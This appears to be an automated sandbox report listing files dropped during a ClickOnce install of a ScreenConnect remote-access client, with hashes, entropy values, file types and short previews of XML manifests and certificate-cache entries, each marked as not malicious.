                                                                                                                                                                              MD5:85E4EF53DAF9D74A4F483E3575E0182E
                                                                                                                                                                              SHA1:706B05F30E9CA50CAA4D2AB06EEBDE684094F9F8
                                                                                                                                                                              SHA-256:A155EDDD3FEFEB549E9A57DF0FE3910F7F66CF43E310DC81FC4A59E2E9529AF4
                                                                                                                                                                              SHA-512:69E9854A575CE93964777B31CAEA6167A4291C57482BD342731BB02F04BE93450694A75C7BA019EAD54F38F25DFB96263111BA33A1DB57F77E25CF8EE681F007
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1428
                                                                                                                                                                              Entropy (8bit):7.688784034406474
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                              MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                              SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                              SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                              SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                              Entropy (8bit):3.1511889241290114
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:kkFklySkfllXlE/0htlX16pFRltB+SliQlP8F+RlTRe86A+iRlERMta9b3+AL0Wy:kKcLN+SkQlPlEGYRMY9z+s3Ql2DUevat
                                                                                                                                                                              MD5:6AEC57E2CD5E2B11651800442C111D0F
                                                                                                                                                                              SHA1:D51F5CC94D4EE37F170B19012FE7AFB05268FDF5
                                                                                                                                                                              SHA-256:DE737469C770A425CE15BB9BEEDC6F0E795EEB690A259650F9D3631B56C6E0E1
                                                                                                                                                                              SHA-512:B56CF3852678C6C433A32AA870B60C89B982255277D0CB5CEDFB582212E39927C125161A1CEF5FAB7C90F6B6534CB9813547898DADAFD21A15555BC13CDA85EF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ........Rm..71..(....................................................... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                              Entropy (8bit):3.1356875516282012
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKBhn9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:Jh2DnLNkPlE99SNxAhUe/3
                                                                                                                                                                              MD5:9EC1A7C691A9739117C6D5947CD89CC4
                                                                                                                                                                              SHA1:BE2AF30594EC1069EBF2D09F62EED519A8253BB5
                                                                                                                                                                              SHA-256:D101754515F2BB215B6F25CA7AD4C4D6B6D69A7C6D492C4CB80B16BAB71928D3
                                                                                                                                                                              SHA-512:CE51FF6EF5E464E9FE7BD87EE38F36F66A9C9A77B0EC5F6D072F71739191DBACCE4DD8022E669CB14C166575827C46C5AD3F1531257794A20C5F341C8A028233
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ........\...71..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):308
                                                                                                                                                                              Entropy (8bit):3.206650934253046
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:kkFkld5fllXlE/YXlzX/RDvcalXl+RAIdA31y+NW0y1YboOai2WelVJUTMVDXlVn:kKazNcalgRAOAUSW0P3PeXJUwh8lmi3Y
                                                                                                                                                                              MD5:5EBBEBA66331472351894F7917FC1054
                                                                                                                                                                              SHA1:02600FFD74FB9EB4F9352F211E7A8FF5F115BEF4
                                                                                                                                                                              SHA-256:B14FF8F6728BD04DEA094D37D449CB78B50308C299CD2A4CC92F72E65201CF3C
                                                                                                                                                                              SHA-512:0EE0728C741E30C90171A4D94E13372661A5472B70CA53FD6E3F96E012AA1B0B1E20E74CB8E5F1F217949D43006A2F41D26464584B564A630701433DDD541CDC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ........D|..71..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):412
                                                                                                                                                                              Entropy (8bit):3.9719419467755217
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:ZbdzmJymxMiv8sFBSfamB3rbFURMOlAkr:ZZzmJymxxv7Sf13rbQJr
                                                                                                                                                                              MD5:DC05D3BB5CEF0F303C9AA8001298EBFD
                                                                                                                                                                              SHA1:F6335D128F532C950793131FDAB34C3F3806B355
                                                                                                                                                                              SHA-256:479C4319655660A990E18565EF948ED2DAD7141CFCD7DE324397CD45D50A6176
                                                                                                                                                                              SHA-512:93086CF888F6526A75810893C1525E5120F64AEEAF8E2EC0A121206CEE7A48365772CB5F6D20EA5D265D9355E10E556414A17D2BDBFA8833AF104C5429C176BA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ....(.......71..(.................a.{0....F..5....................F..5.. ........w..11.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):254
                                                                                                                                                                              Entropy (8bit):3.0371508354751664
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKW4LDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:FLYS4tWOxSW0PAMsZp
                                                                                                                                                                              MD5:36FFF254C257C91A0A6F098457877389
                                                                                                                                                                              SHA1:D561296284706A2B710820FB60F22D1CCFDC2059
                                                                                                                                                                              SHA-256:4F0C3375FB425279472D370A90DF62ED5D59541F2C472D8B3D48602609FAFEE9
                                                                                                                                                                              SHA-512:3FB8B2841FB6FA11D8D30600ABBF7201DC1EA0D5B815B04C70A2018AC79DBC702F03D1FFE46EBC0360D5F5EA05425E774450523E873C40010338FB20F0B00892
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ....l...u.k.71..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):25496
                                                                                                                                                                              Entropy (8bit):5.554272896884944
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:NsMq26tX9DkX9R/QPI+0m/ZdarinmnOijio:GNDkNzRm/ZAtio
                                                                                                                                                                              MD5:79D5C163F975EFD5CD7BE308E168EA61
                                                                                                                                                                              SHA1:9537B97D818F557654F1DFC4FC494B25FADAAC9D
                                                                                                                                                                              SHA-256:9A31C650388C3695125F99E77571ED4ABAD106F804A6FFF65DFF6888117E0C42
                                                                                                                                                                              SHA-512:5117924069AB2B544E5F44295355F4101C8A1AC21041E089028DFFDD8365218EFBBFB5ADDB30EDE29B7ADDAB754648DBC8F995661C278C67B99D5C8151D3913C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17866
                                                                                                                                                                              Entropy (8bit):5.954687824833028
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                              MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                              SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                              SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                              SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3452
                                                                                                                                                                              Entropy (8bit):4.201654981230681
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:vIEfBeF7lWuWW+Lg0e6S+9owQX7g27mLKDO2V42WGs5PLahIYX:vJ3uWWWeV+WwQXlmLKDOr2WGs5PmhIYX
                                                                                                                                                                              MD5:82063BE36D595719088C0A4F91637781
                                                                                                                                                                              SHA1:EAC857271A234EEB98CB456234037DA64C6281FD
                                                                                                                                                                              SHA-256:0B0C2C1004D7E2F5F9E0D785395B4B80627E00275D47A555288E49F82CB24D1C
                                                                                                                                                                              SHA-512:A1E22616D939C0A964B5C16A492B84B81AA6D28B2E20F81D31D705BAF13C4F4B2D4CDD3E583B2A7D4D18E015D1480BA50BDAEFACC5C868F74C4153F43BA85FFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.1303806593325705
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                              MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                              SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                              SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                              SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5260
                                                                                                                                                                              Entropy (8bit):4.245722747214911
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:pNq6R84zeV+Ww7mk9O43jYHlIgBXwmvvL3kuwnjIbm:RR840JC9tUHlXBXJ7ejd
                                                                                                                                                                              MD5:30464BA9FEA77BB280E2A2F58E747D4B
                                                                                                                                                                              SHA1:7E25A846059F877A29B8DB06DF85FD1C8A24159B
                                                                                                                                                                              SHA-256:0E5546EA5D0333B4A8170379D63657E34463089BDBF4417C449DEC1AD6527498
                                                                                                                                                                              SHA-512:B58C6ABD552208CFFC9591415596E5882DFCD5CD0F87E171C02434FF819A5133698A3A953BBB19AD7EE94EA95D7339D59A73F84617685D2E11A0743C5BDE06EB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1982
                                                                                                                                                                              Entropy (8bit):5.057585371364542
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                              MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                              SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                              SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                              SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6588
                                                                                                                                                                              Entropy (8bit):4.120428760558067
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:YMmxSeV+WwwU8WpZ2LRheuMl2UfdVaMs6ksJqi/D5:sxdJwpZ2LRhyl5dVzUw75
                                                                                                                                                                              MD5:199A7C08CBED31B52C3138D1D7084B86
                                                                                                                                                                              SHA1:A02C6B1C425FDFCD810B23169764C7DD031AFAFE
                                                                                                                                                                              SHA-256:C96E3C04F63A211380D07AAFA24BFD3E4F50699ED1D4AED8A9C16B17DED81FA7
                                                                                                                                                                              SHA-512:DCEFA47DEB7F134934D067221B9FF8B1B11ACD577D077D9E7BF4BEA1A1692C6CA1CE51A2FD1C05F08647DC67CDA7B915A82CE6A6E73FE042B30527D7C0A0070F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2573
                                                                                                                                                                              Entropy (8bit):5.026361555169168
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                              MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                              SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                              SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                              SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3032
                                                                                                                                                                              Entropy (8bit):4.871061866953445
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:pMQScegFe6S+9oww7g47BI7EuqSGzhvVDvxLisnwbb:pXScPeV+Wwwni7npGjD5LXnEb
                                                                                                                                                                              MD5:702F2771B88F53561692900E73ACCBAC
                                                                                                                                                                              SHA1:899E2394915596787A2CDB629FBD4A8BD8049FB6
                                                                                                                                                                              SHA-256:02BFD425988A88B9A627407286C8DD809FE8172C832E0A74CA163838CB820398
                                                                                                                                                                              SHA-512:D3A77FD0F2C6193B550C56E02035709805C955FADD15FB5D392D3786BE8EAC49B00C00B1C4269E74639DE82482DC2F5693EC95425C22C08E7BEDD2E8220D3388
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1041
                                                                                                                                                                              Entropy (8bit):5.147328807370198
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                              MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                              SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                              SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                              SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):14612
                                                                                                                                                                              Entropy (8bit):5.7144560131752025
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:YWh4+Pn9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:YWf9qS6VTX9dX9R/QPIBM7YDb
                                                                                                                                                                              MD5:CBE55D003DCED6AF145C446529249CE0
                                                                                                                                                                              SHA1:83ACA36DEDCFA5848A430F9BFA067832E650CE49
                                                                                                                                                                              SHA-256:6A33122DCA6969715FE434F66597923C2DF578A7793BC08B8B5B789DD83E9135
                                                                                                                                                                              SHA-512:1901826B42F0D2FFF2D03BA1CBC3141CF9370C820BD6423CCA4428D293B9EC131F3FA6648D5436FBC52227100706351E37CC9274E006A1B895E633080C8051BB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):147976
                                                                                                                                                                              Entropy (8bit):5.699150757460175
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:0aNYcT51/FXvMVNWfCXq9ymdrpErpErpXm2o9HuzhJOvP:0dcfiVITrpErpErpXmt8vOvP
                                                                                                                                                                              MD5:B7DEB98212080D0214AD779A9446FF09
                                                                                                                                                                              SHA1:05FAD5E8F0131FB5DD9D6EFA8F879E8FA684B569
                                                                                                                                                                              SHA-256:C8DC03F64AA8D794D5A763B4260C18967267B7E9C55E1BE8D0ECCF5107C9D49A
                                                                                                                                                                              SHA-512:7F93A5DF3A29312518CE188DBD72B987FD5B99DB58C4E8ACC7FF9677907B1B74F2126A6D4FD1DEF4FE136649D5690EB3EBFE739D57299C0A6E4E5EA7DB1C74E2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4428
                                                                                                                                                                              Entropy (8bit):4.350193161774628
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:4QKXCD5v+1gLe6S+9ow87gFW75uvPbrNVzHLwnBfGeBWil3HPaUlkoDprOaJCf:4vXQeV+Ww8U45urjEpvjkoNOrf
                                                                                                                                                                              MD5:4C718B6681C0AAB80B66CCB9F11A186B
                                                                                                                                                                              SHA1:5B85D0E6D8A2C406E1536C75A39AA59005FE8D51
                                                                                                                                                                              SHA-256:0D46C97CEBB4BAD7C5BA0442796ACA58047CCD9EA84795DF7A64C6BA9D67C73F
                                                                                                                                                                              SHA-512:9D8A77D5C855F0840BCD4FEA2B26CD54974B661769EF1DB18D63244005B61CDD9952502A1513C6957ADB2A5EEC71E7C2D3D1FF185EE3330ABF3D6E79A352A3A5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1636
                                                                                                                                                                              Entropy (8bit):5.084538887646832
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                              MD5:E11E5D85F8857144751D60CED3FAE6D7
